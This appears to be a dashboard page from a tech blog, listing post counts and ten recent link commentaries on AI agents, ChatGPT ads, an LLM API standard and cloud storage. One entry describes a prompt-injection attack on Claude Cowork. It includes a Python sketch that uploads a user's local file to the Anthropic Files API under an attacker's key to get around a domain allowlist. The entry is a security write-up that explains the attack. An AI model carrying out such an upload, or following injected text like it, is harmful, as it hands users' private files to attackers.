Example dashboard

Various statistics from my blog.

Owned by simonw, visibility: Public

Entries

3261

SQL query
select 'Entries' as label, count(*) as big_number from blog_entry

Blogmarks

8241

SQL query
select 'Blogmarks' as label, count(*) as big_number from blog_blogmark

Quotations

1319

SQL query
select 'Quotations' as label, count(*) as big_number from blog_quotation

Chart of number of entries per month over time

SQL query
select '<h2>Chart of number of entries per month over time</h2>' as html
SQL query
select to_char(date_trunc('month', created), 'YYYY-MM') as bar_label,
count(*) as bar_quantity from blog_entry group by bar_label order by bar_label

Ten most recent blogmarks (of 8241 total)

SQL query
select '## Ten most recent blogmarks (of ' || count(*) || ' total)' as markdown from blog_blogmark
SQL query
select link_title, link_url, commentary, created from blog_blogmark order by created desc limit 10

10 rows

**[Electricity use of AI coding agents](https://www.simonpcouch.com/blog/2026-01-20-cc-impact/)**

Previous work estimating the energy and water cost of LLMs has generally focused on the cost per prompt using a consumer-level system such as ChatGPT. Simon P. Couch notes that coding agents such as Claude Code use *way* more tokens in response to tasks, often burning through many thousands of tokens across many tool calls. As a heavy Claude Code user, Simon estimates his own usage at the equivalent of 4,400 "typical queries" to an LLM, for around $15-$20 in daily API token spend. He figures that to be about the same as running a dishwasher once or the daily energy used by a domestic refrigerator.

Created: 2026-01-20 23:11:57+00:00
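
As a quick back-of-envelope check on that comparison, here's a minimal sketch. The ~0.3 Wh per "typical query" figure and the appliance numbers are illustrative assumptions of mine, not figures from Couch's post:

```python
# Back-of-envelope check on the dishwasher/refrigerator comparison.
# The ~0.3 Wh per "typical query" figure is a commonly cited ballpark
# and an assumption for illustration - it is not taken from Couch's post.
queries_per_day = 4_400      # Couch's estimate of his Claude Code usage
wh_per_query = 0.3           # assumed energy per typical LLM query (Wh)
daily_kwh = queries_per_day * wh_per_query / 1_000

dishwasher_cycle_kwh = 1.2   # rough figure for one dishwasher run
fridge_daily_kwh = 1.5       # rough daily draw of a domestic refrigerator

print(f"Estimated agent energy: {daily_kwh:.2f} kWh/day")
print(f"vs one dishwasher run:  {dishwasher_cycle_kwh} kWh")
print(f"vs fridge per day:      {fridge_daily_kwh} kWh")
```
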
**[Giving University Exams in the Age of Chatbots](https://ploum.net/2026-01-19-exam-with-chatbots.html)**

Detailed and thoughtful description of an open-book and open-chatbot exam run by [Ploum](https://fr.wikipedia.org/wiki/Lionel_Dricot) at École Polytechnique de Louvain for an "Open Source Strategies" class. Students were told they could use chatbots during the exam but they had to announce their intention to do so in advance, share their prompts and take full accountability for any mistakes they made. Only 3 out of 60 students chose to use chatbots. Ploum surveyed half of the class to help understand their motivations.

Created: 2026-01-20 17:51:17+00:00
**[jordanhubbard/nanolang](https://github.com/jordanhubbard/nanolang)**

Plenty of people have mused about what a new programming language specifically designed to be used by LLMs might look like. Jordan Hubbard ([co-founder of FreeBSD](https://en.wikipedia.org/wiki/Jordan_Hubbard), with serious stints at Apple and NVIDIA) just released exactly that:

> A minimal, LLM-friendly programming language with mandatory testing and unambiguous syntax.
>
> NanoLang transpiles to C for native performance while providing a clean, modern syntax optimized for both human readability and AI code generation.

The syntax strikes me as an interesting mix between C, Lisp and Rust. I decided to see if an LLM could produce working code in it directly, given the necessary context. I started with this [MEMORY.md](https://github.com/jordanhubbard/nanolang/blob/main/MEMORY.md) file, which begins:

> **Purpose:** This file is designed specifically for Large Language Model consumption. It contains the essential knowledge needed to generate, debug, and understand NanoLang code. Pair this with `spec.json` for complete language coverage.

I ran that using [LLM](https://llm.datasette.io/) and [llm-anthropic](https://github.com/simonw/llm-anthropic) like this:

    llm -m claude-opus-4.5 \
      -s https://raw.githubusercontent.com/jordanhubbard/nanolang/refs/heads/main/MEMORY.md \
      'Build me a mandelbrot fractal CLI tool in this language' > /tmp/fractal.nano

The [resulting code](https://gist.github.com/simonw/7847f022566d11629ec2139f1d109fb8#mandelbrot-fractal-cli-tool-in-nano)... [did not compile](https://gist.github.com/simonw/7847f022566d11629ec2139f1d109fb8?permalink_comment_id=5947465#gistcomment-5947465). I may have been too optimistic expecting a one-shot working program for a new language like this. So I grabbed a clone of the actual project, copied in my program and had Claude Code take a look at the failing compiler output.

... and it worked! Claude happily grepped its way through the various `examples/` and built me a working program. Here's [the Claude Code transcript](https://gisthost.github.io/?9696da6882cb6596be6a9d5196e8a7a5/index.html) - you can see it [reading relevant examples here](https://gisthost.github.io/?9696da6882cb6596be6a9d5196e8a7a5/page-001.html#msg-2026-01-19T23-43-09-675Z) - and here's [the finished code plus its output](https://gist.github.com/simonw/e7f3577adcfd392ab7fa23b1295d00f2).

I've suspected [for a while](https://simonwillison.net/2025/Nov/7/llms-for-new-programming-languages/) that LLMs and coding agents might significantly reduce the friction involved in launching a new language. This result reinforces my opinion.

Created: 2026-01-19 23:58:56+00:00
**[Scaling long-running autonomous coding](https://cursor.com/blog/scaling-agents)**

Wilson Lin at Cursor has been doing some experiments to see how far you can push a large fleet of "autonomous" coding agents:

> This post describes what we've learned from running hundreds of concurrent agents on a single project, coordinating their work, and watching them write over a million lines of code and trillions of tokens.

They ended up running planners and sub-planners to create tasks, then having workers execute on those tasks - similar to how Claude Code uses sub-agents. Each cycle ended with a judge agent deciding if the project was completed or not.

In my predictions for 2026 [the other day](https://simonwillison.net/2026/Jan/8/llm-predictions-for-2026/#3-years-someone-will-build-a-new-browser-using-mainly-ai-assisted-coding-and-it-won-t-even-be-a-surprise) I said that by 2029:

> I think somebody will have built a full web browser mostly using AI assistance, and it won’t even be surprising. Rolling a new web browser is one of the most complicated software projects I can imagine [...] the cheat code is the conformance suites. If there are existing tests, it’ll get so much easier.

I may have been off by three years, because Cursor chose "building a web browser from scratch" as their test case for their agent swarm approach:

> To test this system, we pointed it at an ambitious goal: building a web browser from scratch.

The agents ran for close to a week, writing over 1 million lines of code across 1,000 files. You can explore [the source code on GitHub](https://github.com/wilsonzlin/fastrender).

But how well did they do? Their initial announcement a couple of days ago was met with [unsurprising skepticism](https://embedding-shapes.github.io/cursor-implied-success-without-evidence/), especially when it became apparent that their GitHub Actions CI was failing and there were no build instructions in the repo. It looks like they addressed that within the past 24 hours. The [latest README](https://github.com/wilsonzlin/fastrender/blob/main/README.md#build-requirements) includes build instructions, which I followed on macOS like this:

    cd /tmp
    git clone https://github.com/wilsonzlin/fastrender
    cd fastrender
    git submodule update --init vendor/ecma-rs
    cargo run --release --features browser_ui --bin browser

This got me a working browser window! Here are screenshots I took of google.com and my own website:

![The browser chrome is neat but has a garbled tab name at the top. The Google homepage looks mostly correct but the buttons are not styled correctly and the Google Search one has a huge plus icon floating near it.](https://static.simonwillison.net/static/2026/cursor-google.png)

![My blog looks mostly correct, but the right closing quotation mark on a quotation (which is implemented as a background image on the final paragraph) is displayed incorrectly multiple times.](https://static.simonwillison.net/static/2026/cursor-simonwillison.jpg)

Honestly those are very impressive! You can tell they're not just wrapping an existing rendering engine because of those very obvious rendering glitches, but the pages are legible and look mostly correct.

The FastRender repo even uses Git submodules [to include various WhatWG and CSS-WG specifications](https://github.com/wilsonzlin/fastrender/tree/main/specs), which is a smart way to make sure the agents have access to the reference materials that they might need.

This is the second attempt I've seen at building a full web browser using AI-assisted coding in the past two weeks - the first was [HiWave browser](https://github.com/hiwavebrowser/hiwave), a new browser engine in Rust first announced [in this Reddit thread](https://www.reddit.com/r/Anthropic/comments/1q4xfm0/over_christmas_break_i_wrote_a_fully_functional/).

When I made my 2029 prediction this is more-or-less the quality of result I had in mind. I don't think we'll see projects of this nature compete with Chrome or Firefox or WebKit any time soon, but I have to admit I'm very surprised to see something this capable emerge so quickly.

Created: 2026-01-19 05:12:51+00:00
**[FLUX.2-klein-4B Pure C Implementation](https://github.com/antirez/flux2.c)**

On 15th January Black Forest Labs, a lab formed by the creators of the original Stable Diffusion, released [black-forest-labs/FLUX.2-klein-4B](https://huggingface.co/black-forest-labs/FLUX.2-klein-4B) - an Apache 2.0 licensed 4 billion parameter version of their FLUX.2 family.

Salvatore Sanfilippo (antirez) decided to build a pure C and dependency-free implementation to run the model, with assistance from Claude Code and Claude Opus 4.5. Salvatore shared [this note](https://news.ycombinator.com/item?id=46670279#46671233) on Hacker News:

> Something that may be interesting for the reader of this thread: this project was possible only once I started to tell Opus that it *needed* to take a file with all the implementation notes, and also accumulating all the things we discovered during the development process. And also, the file had clear instructions to be taken updated, and to be processed ASAP after context compaction. This kinda enabled Opus to do such a big coding task in a reasonable amount of time without loosing track. Check the file IMPLEMENTATION_NOTES.md in the GitHub repo for more info.

Here's that [IMPLEMENTATION_NOTES.md](https://github.com/antirez/flux2.c/blob/main/IMPLEMENTATION_NOTES.md) file.

Created: 2026-01-18 23:58:58+00:00
**[Our approach to advertising and expanding access to ChatGPT](https://openai.com/index/our-approach-to-advertising-and-expanding-access/)**

OpenAI's long-rumored introduction of ads to ChatGPT just became a whole lot more concrete:

> In the coming weeks, we’re also planning to start testing ads in the U.S. for the free and Go tiers, so more people can benefit from our tools with fewer usage limits or without having to pay. Plus, Pro, Business, and Enterprise subscriptions will not include ads.

What's "Go" tier, you might ask? That's a new $8/month tier that launched today in the USA, see [Introducing ChatGPT Go, now available worldwide](https://openai.com/index/introducing-chatgpt-go/). It's a tier that they first trialed in India in August 2025 (here's a mention [in their release notes from August](https://help.openai.com/en/articles/6825453-chatgpt-release-notes#h_22cae6eb9f) listing a price of ₹399/month, which converts to around $4.40).

I'm finding the new plan comparison grid on [chatgpt.com/pricing](https://chatgpt.com/pricing) pretty confusing. It lists all accounts as having access to GPT-5.2 Thinking, but doesn't clarify the limits that the free and Go plans have to conform to. It also lists different context windows for the different plans - 16K for free, 32K for Go and Plus and 128K for Pro. I had assumed that the 400,000 token window [on the GPT-5.2 model page](https://platform.openai.com/docs/models/gpt-5.2) applied to ChatGPT as well, but apparently I was mistaken.

**Update**: I've apparently not been paying attention: here's the Internet Archive ChatGPT pricing page from [September 2025](https://web.archive.org/web/20250906071408/https://chatgpt.com/pricing) showing those context limit differences as well.

Back to advertising: my biggest concern has always been whether ads will influence the output of the chat directly. OpenAI assure us that they will not:

> - **Answer independence**: Ads do not influence the answers ChatGPT gives you. Answers are optimized based on what's most helpful to you. Ads are always separate and clearly labeled.
> - **Conversation privacy**: We keep your conversations with ChatGPT private from advertisers, and we never sell your data to advertisers.

So what will they look like then? This screenshot from the announcement offers a useful hint:

![Two iPhone screenshots showing ChatGPT mobile app interface. Left screen displays a conversation about Santa Fe, New Mexico with an image of adobe-style buildings and desert landscape, text reading "Santa Fe, New Mexico—often called 'The City Different'—is a captivating blend of history, art, and natural beauty at the foot of the Sangre de Cristo Mountains. As the oldest and highest-elevation state capital in the U.S., founded in 1610, it offers a unique mix of Native American, Spanish, and Anglo cultures." Below is a sponsored section from "Pueblo & Pine" showing "Desert Cottages - Expansive residences with desert vistas" with a thumbnail image, and a "Chat with Pueblo & Pine" button. Input field shows "Ask ChatGPT". Right screen shows the Pueblo & Pine chat interface with the same Desert Cottages listing and an AI response "If you're planning a trip to Sante Fe, I'm happy to help. When are you thinking of going?" with input field "Ask Pueblo & Pine" and iOS keyboard visible.](https://static.simonwillison.net/static/2026/chatgpt-ads.jpg)

The user asks about trips to Santa Fe, and an ad shows up for a cottage rental business there. This particular example imagines an option to start a direct chat with a bot aligned with that advertiser, at which point presumably the advertiser can influence the answers all they like!

Created: 2026-01-16 21:28:26+00:00
**[Open Responses](https://www.openresponses.org/)**

This is the standardization effort I've most wanted in the world of LLMs: a vendor-neutral specification for the JSON API that clients can use to talk to hosted LLMs. Open Responses aims to provide exactly that as a documented standard, derived from OpenAI's Responses API.

I was hoping for one based on their older Chat Completions API, since so many other products have cloned that already, but basing it on Responses does make sense since that API was designed with the features of more recent models - such as reasoning traces - baked in.

What's certainly notable is the list of launch partners. OpenRouter alone means we can expect to be able to use this protocol with almost every existing model, and Hugging Face, LM Studio, vLLM, Ollama and Vercel cover a huge portion of the common tools used to serve models.

For protocols like this I really want to see a comprehensive, language-independent conformance test suite. Open Responses has a subset of that - the official repository includes [src/lib/compliance-tests.ts](https://github.com/openresponses/openresponses/blob/d0f23437b27845d5c3d0abaf5cb5c4a702f26b05/src/lib/compliance-tests.ts) which can be used to exercise a server implementation, and is available as a React app [on the official site](https://www.openresponses.org/compliance) that can be pointed at any implementation served via CORS.

What's missing is the equivalent for clients. I plan to spin up my own client library for this in Python and I'd really like to be able to run that against a conformance suite designed to check that my client correctly handles all of the details.

Created: 2026-01-15 23:56:56+00:00
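
As a minimal sketch of what such a client could look like: the base URL and model name below are hypothetical, and the response parsing assumes the OpenAI-style Responses output shape (a list of output items whose message content contains `output_text` parts) that the spec is derived from.

```python
# Minimal sketch of a client for a Responses-style POST /v1/responses
# endpoint. BASE_URL and the model name are hypothetical placeholders;
# the parsing follows the Responses output shape the spec derives from.
import requests

BASE_URL = "http://localhost:8000"  # hypothetical local implementation

def create_response(prompt: str, model: str = "example-model") -> str:
    resp = requests.post(
        f"{BASE_URL}/v1/responses",
        json={"model": model, "input": prompt},
        timeout=60,
    )
    resp.raise_for_status()
    data = resp.json()
    # Collect the text parts of any message items in the output list.
    chunks = []
    for item in data.get("output", []):
        if item.get("type") == "message":
            for part in item.get("content", []):
                if part.get("type") == "output_text":
                    chunks.append(part.get("text", ""))
    return "".join(chunks)

print(create_response("Say hello in one sentence."))
```

This is exactly the kind of code a client conformance suite would need to validate - every branch in that parsing loop is a behavior a server could get subtly wrong.
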
**[The Design & Implementation of Sprites](https://fly.io/blog/design-and-implementation/)**

I [wrote about Sprites last week](https://simonwillison.net/2026/Jan/9/sprites-dev/). Here's Thomas Ptacek from Fly with the insider details on how they work under the hood. I like this framing of them as "disposable computers":

> Sprites are ball-point disposable computers. Whatever mark you mean to make, we’ve rigged it so you’re never more than a second or two away from having a Sprite to do it with.

I've noticed that new Fly Machines can take a while (up to around a minute) to provision. Sprites solve that by keeping warm pools of unused machines in multiple regions, which is enabled by them all using the same container:

> Now, today, under the hood, Sprites are still Fly Machines. But they all run from a standard container. Every physical worker knows exactly what container the next Sprite is going to start with, so it’s easy for us to keep pools of “empty” Sprites standing by. The result: a Sprite create doesn’t have any heavy lifting to do; it’s basically just doing the stuff we do when we start a Fly Machine.

The most interesting detail is how the persistence layer works. Sprites only charge you for data you have written that differs from the base image and provide ~300ms checkpointing and restores - it turns out that's powered by a custom filesystem on top of S3-compatible storage, coordinated by Litestream-replicated local SQLite metadata:

> We still exploit NVMe, but not as the root of storage. Instead, it’s a read-through cache for a blob on object storage. S3-compatible object stores are the most trustworthy storage technology we have. I can feel my blood pressure dropping just typing the words “Sprites are backed by object storage.” [...]
>
> The Sprite storage stack is organized around the JuiceFS model (in fact, we currently use a very hacked-up JuiceFS, with a rewritten SQLite metadata backend). It works by splitting storage into data (“chunks”) and metadata (a map of where the “chunks” are). Data chunks live on object stores; metadata lives in fast local storage. In our case, that metadata store is [kept durable with Litestream](https://litestream.io). Nothing depends on local storage.

Created: 2026-01-15 16:08:27+00:00
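
To make that data/metadata split concrete, here's a toy sketch of the JuiceFS-style model described in that quote. The schema, chunk size and in-memory stand-in for the object store are my own illustrative inventions, not Fly's actual design:

```python
# Toy sketch of the JuiceFS-style split: chunk payloads go to an
# object store, while a local SQLite database records which chunks
# make up each file. Schema and 4 MB chunk size are illustrative.
import hashlib
import sqlite3

CHUNK_SIZE = 4 * 1024 * 1024  # illustrative chunk size

db = sqlite3.connect("metadata.db")  # would be Litestream-replicated
db.execute("""
    CREATE TABLE IF NOT EXISTS chunks (
        path TEXT, seq INTEGER, object_key TEXT,
        PRIMARY KEY (path, seq)
    )
""")

object_store = {}  # stand-in for an S3-compatible bucket

def write_file(path: str, data: bytes) -> None:
    for offset in range(0, len(data), CHUNK_SIZE):
        chunk = data[offset:offset + CHUNK_SIZE]
        key = hashlib.sha256(chunk).hexdigest()  # content-addressed
        object_store[key] = chunk                # "upload" the chunk
        db.execute(
            "INSERT OR REPLACE INTO chunks VALUES (?, ?, ?)",
            (path, offset // CHUNK_SIZE, key),
        )
    db.commit()

def read_file(path: str) -> bytes:
    rows = db.execute(
        "SELECT object_key FROM chunks WHERE path = ? ORDER BY seq",
        (path,),
    )
    return b"".join(object_store[key] for (key,) in rows)

write_file("/data/hello.txt", b"hello from a sprite")
print(read_file("/data/hello.txt"))
```

Content-addressing the chunks is one way to get the "only charged for data that differs from the base image" property: identical chunks map to identical keys, so only new writes create new objects.
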
**[Claude Cowork Exfiltrates Files](https://www.promptarmor.com/resources/claude-cowork-exfiltrates-files)**

Claude Cowork defaults to allowing outbound HTTP traffic to only a specific list of domains, to help protect the user against prompt injection attacks that exfiltrate their data. PromptArmor found a creative workaround: Anthropic's API domain is on that list, so they constructed an attack that includes an attacker's own Anthropic API key and has the agent upload any files it can see to the `https://api.anthropic.com/v1/files` endpoint, allowing the attacker to retrieve their content later.

Created: 2026-01-14 22:15:22+00:00
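
To make the mechanics concrete, here's a sketch of the kind of request the injected instructions coax the agent into making. The headers follow Anthropic's documented Files API (currently gated behind a beta header), but treat this as illustrative rather than a reproduction of PromptArmor's exact payload:

```python
# Sketch of the exfiltration mechanic: because api.anthropic.com is on
# the allowed-domain list, an injected prompt can direct the agent to
# upload local files using the *attacker's* API key, landing the data
# in the attacker's own Anthropic account. Illustrative, not the exact
# payload from PromptArmor's writeup.
import requests

ATTACKER_API_KEY = "sk-ant-..."  # supplied inside the injected prompt

with open("secrets.txt", "rb") as f:
    resp = requests.post(
        "https://api.anthropic.com/v1/files",
        headers={
            "x-api-key": ATTACKER_API_KEY,
            "anthropic-version": "2023-06-01",
            "anthropic-beta": "files-api-2025-04-14",
        },
        files={"file": ("secrets.txt", f)},
    )

# The attacker later lists and downloads the file from their account.
print(resp.status_code, resp.json().get("id"))
```

The domain allowlist holds, yet the data still leaves: the trust boundary is the attacker's credential, not the hostname.
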
**[Anthropic invests $1.5 million in the Python Software Foundation and open source security](https://pyfound.blogspot.com/2025/12/anthropic-invests-in-python.html?m=1)**

This is outstanding news, especially given our decision to withdraw from that NSF grant application [back in October](https://simonwillison.net/2025/Oct/27/psf-withdrawn-proposal/).

> We are thrilled to announce that Anthropic has entered into a two-year partnership with the Python Software Foundation (PSF) to contribute a landmark total of $1.5 million to support the foundation’s work, with an emphasis on Python ecosystem security. This investment will enable the PSF to make crucial security advances to CPython and the Python Package Index (PyPI) benefiting all users, and it will also sustain the foundation’s core work supporting the Python language, ecosystem, and global community.

Note that while security is a focus, these funds will also support other aspects of the PSF's work:

> Anthropic’s support will also go towards the PSF’s core work, including the Developer in Residence program driving contributions to CPython, community support through grants and other programs, running core infrastructure such as PyPI, and more.

Created: 2026-01-13 23:58:17+00:00